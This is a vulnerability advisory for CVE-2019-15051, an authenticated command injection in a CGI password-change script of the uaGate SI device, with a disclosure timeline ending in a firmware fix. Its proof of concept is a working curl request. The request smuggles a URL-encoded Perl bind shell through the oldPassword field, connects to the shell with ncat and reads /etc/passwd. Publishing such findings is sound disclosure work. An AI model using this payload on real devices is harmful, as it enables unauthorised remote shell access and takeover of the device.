CVE-2019-15051 - uaGate yet another authenticated remote code execution

Abstract:

A cgi script of the uaGate SI handles its parameters in an unsafe fashion. Maliciously carfted url parameters can transfere an arbitrary command payload that is executed with the rights of the webserver. The command output returned to stdout is returned by the Webserver in response to the malicious web request.

Attack Vector

An authenticated attacker can execute arbitrary commands by issuing a web request.

Proof of Concept Details

curl http://uagate/cgi-bin/changePassword.cgi -d "newPassword=*******&confirmPassword=*******&user=mfadmin&oldPassword=*******+%26%26+perl+-e+%27use+Socket%3B%24p%3D4223%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bbind%28S%2Csockaddr_in%28%24p%2C+INADDR_ANY%29%29%3Blisten%28S%2CSOMAXCONN%29%3Bfor%28%3B%24p%3Daccept%28C%2CS%29%3Bclose+C%29%7Bopen%28STDIN%2C%22%3E%26C%22%29%3Bopen%28STDOUT%2C%22%3E%26C%22%29%3Bopen%28STDERR%2C%22%3E%26C%22%29%3Bexec%28%22%2Fbin%2Fbash+-i%22%29%3B%7D%3B%27" --user mfadmin:****** & (sleep 1; ncat uagate 4223)
cat /etc/passwd

Attack Scenario

This exploit can be used in an exploit chain together with a privilege escalation vulnerability to gain complete control over the target device.

Timeline

  • day 0 - re-test of uaGate SI Device - 07.08.2019
  • day 7 - CVE ID issued by MITRE - 14.08.2019
  • day 47 - issue report to manufacturer - 23.09.2019
  • day 61 - manufacurer ackloknowledged security issues - 07.10.2019
  • day 63 - fix found in Firmware 1.72.00.1996 - 09.10.2019
  • day 64 - released - 10.10.2019

Credits

rfr@mioso.com

  • uaGate SI Product Page
  • Softing AG